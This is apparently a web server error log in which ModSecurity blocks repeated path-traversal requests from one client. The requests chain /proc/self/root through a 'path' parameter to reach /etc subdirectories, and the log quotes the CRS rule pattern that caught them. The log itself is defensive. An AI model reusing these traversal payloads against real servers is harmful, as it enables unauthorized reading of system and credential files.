[Mon Mar 16 12:08:30.835123 2026] [:error] [pid 10651:tid 140411716749056] [client 74.7.243.203:33466] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgc7rysWC90G-1nBrBCbwAAAYM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:08:32.955710 2026] [:error] [pid 10709:tid 140411683178240] [client 74.7.243.203:33474] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgc8BXjF1vJNtV6CWrzMAAAAcc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:08:37.457095 2026] [:error] [pid 10831:tid 140411666392832] [client 74.7.243.203:33486] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgc9Y6lpbStxTqkSktpaQAAAkk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:08:38.747443 2026] [:error] [pid 21946:tid 140411616036608] [client 74.7.243.203:33492] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgc9nbQATo66fKoS7xL7AAAAM8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:08:40.215366 2026] [:error] [pid 11972:tid 140411708356352] [client 74.7.243.203:37588] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgc-Jqj1wV0Si-OkefpZgAAAAQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:08:44.429949 2026] [:error] [pid 10709:tid 140411632822016] [client 74.7.243.203:37602] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgc_BXjF1vJNtV6CWrzMwAAAc0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:08:48.056141 2026] [:error] [pid 10831:tid 140411607643904] [client 74.7.243.203:37606] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgdAI6lpbStxTqkSktpbgAAAlA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:08:49.433360 2026] [:error] [pid 32654:tid 140411565680384] [client 74.7.243.203:37612] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgdAQlT9VtDQc7bgUysrwAAARU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:08:50.682526 2026] [:error] [pid 10651:tid 140411649607424] [client 74.7.243.203:40000] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgdArysWC90G-1nBrBCdAAAAYs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:08:53.282947 2026] [:error] [pid 21806:tid 140411582465792] [client 74.7.244.31:48114] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgdBdSswJuvopo3lOha_wAAAJM"]
[Mon Mar 16 12:08:59.695791 2026] [:error] [pid 21806:tid 140411674785536] [client 74.7.243.203:40008] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgdC9SswJuvopo3lOhbBAAAAIg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:09:03.137661 2026] [:error] [pid 10772:tid 140411683178240] [client 74.7.243.203:43724] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgdD_9ocpUE4ed4uDzrCwAAAgc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:09:08.635903 2026] [:error] [pid 11972:tid 140411716749056] [client 74.7.243.203:43726] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgdFJqj1wV0Si-OkefpkAAAAAM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:09:24.528802 2026] [:error] [pid 10651:tid 140411691570944] [client 74.7.243.203:43734] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgdJLysWC90G-1nBrBCgwAAAYY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:09:25.820181 2026] [:error] [pid 10709:tid 140411616036608] [client 74.7.243.203:59454] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgdJRXjF1vJNtV6CWrzOAAAAc8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:09:28.080273 2026] [:error] [pid 21806:tid 140411548894976] [client 74.7.243.203:59466] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgdKNSswJuvopo3lOhbBwAAAJc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:09:29.357814 2026] [:error] [pid 21533:tid 140411540502272] [client 74.7.243.203:59478] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgdKXjZBu2q05ozVU9USgAAAVg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:09:36.999104 2026] [:error] [pid 21806:tid 140411733534464] [client 74.7.243.203:54510] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgdMNSswJuvopo3lOhbEQAAAIE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:09:38.303608 2026] [:error] [pid 11972:tid 140411548894976] [client 74.7.243.203:54514] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgdMpqj1wV0Si-OkefprQAAABc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:09:39.582530 2026] [:error] [pid 10772:tid 140411616036608] [client 74.7.243.203:54524] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgdM_9ocpUE4ed4uDzrEgAAAg8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:09:40.799288 2026] [:error] [pid 21533:tid 140411708356352] [client 74.7.243.203:44578] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgdNHjZBu2q05ozVU9UTAAAAUQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:09:43.111990 2026] [:error] [pid 10651:tid 140411666392832] [client 74.7.243.203:44580] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgdN7ysWC90G-1nBrBChgAAAYk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
